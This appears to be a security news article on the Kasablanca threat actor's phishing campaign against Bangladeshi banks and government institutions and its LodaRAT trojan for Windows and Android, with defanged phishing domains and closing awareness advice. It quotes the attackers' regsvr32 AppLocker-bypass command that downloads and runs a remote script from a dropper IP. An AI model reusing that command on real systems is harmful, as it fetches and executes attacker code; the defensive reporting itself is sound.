Last year of October 2020, the threat actor Kasablanca attacked banks and carrier-grade voice-over-IP software vendors intending to distribute malware droppers. Recently, the e-Government Computer Incident Response Team (e-Gov CIRT) warned the Bangladesh local financial and government organizations that there is an ongoing attack from Kasablanca wherein they have identified a total of 18 phishing websites. The e-Gov CIRT operates to secure the cyberspace of Bangladesh. And as part of the e-Gov CIRT’s responsibilities, which is to review, respond and provide guidance on security threats & vulnerabilities of the Bangladesh government organizations, they have already notified the Bangladesh Telecommunication Regulatory Commission block the malicious websites.
The seven identified phishing sites are patterned in the name of the Bangladesh prominent government institutions. The following phishing domains are:
- Bkashagent[.]com
- corona-bd[.]com
- bkash[.]club
- bdpolice[.]co
- isiamibankbd[.]com
- Bangladesh-bank[.]com
- Bracbank[.]info
The threat actors aim to mislead the users and collect confidential information using fake phishing websites.
Kasablanca targets the Bangladesh Bank, Bangladesh Police, bKash, BRAC Bank, Islami Bank Bangladesh, and Corona.gov.bd. by using hybrid campaigns (Windows and Android).
Kasablanca is the threat actor who developed the LodaRAT, a remote access trojan malware that targets Android and Windows. Previously, LodaRat malware is only available on Windows. However, the malware developers have progressed and created the Android version and improved the Windows Loda capabilities. The first stage of the attack begins with a phishing email or SMS messages sent to the victim and lure into opening a malicious RTF document that exploits the Microsoft Office Memory Corruption Vulnerability (CVE-2017-11882). The malware will bypass the Windows Applocker by using the regsvr32 utility and runs the following command to download and execute the malicious SCT files containing Javascript to download and execute the Loda Binary file.
Command: regsvr32 / s / u / n /i:hxxp://107[.]172[.]30[.] 213/5.sct scrobj.dll
The latest version of the Windows LodaRAT is version 1.1.8 and uses a dropper site under the IP 107[.]172.30.213 that holds the download scripts and payload. This version has a new addition that allows threat actors to remotely access the target machine using RDP (Remote Desktop Protocol) by changing the security configurations in Windows. Another RAT malware capability is the improved sound command that can capture the audio from a connected microphone with any recording length indicated by the threat actor.
On the other hand, the Android version of LodaRAT (previously referred to as “Gaza007”) works as a stalker application. The malicious application can operate a wide range of tasks such as taking photos and screenshots, reading SMS and call logs, sending messages and calls to specific numbers, and recording the user’s location. The Android LodaRAT can also record the audio calls with limitations as it can only record the audio from the targeted user and not the other end of the call.
As of today, the identity of the espionage group remains unclear. Nevertheless, the threat actor mainly focuses on information gathering and is continuously evolving to target more users.
How to prevent these types of attacks?
Cyber threat attacks are frequent, and the level of intricacy to prevent and detect the attacks differs. The key pillars in preventing this attack are educating the employees and maintaining a high awareness of suspicion. Educating the individuals about the attackers’ threat vectors would increase awareness of the ongoing hybrid threat campaigns. Simultaneously, the organization should deploy and maintain a robust multilayer security protocol within the company’s network.
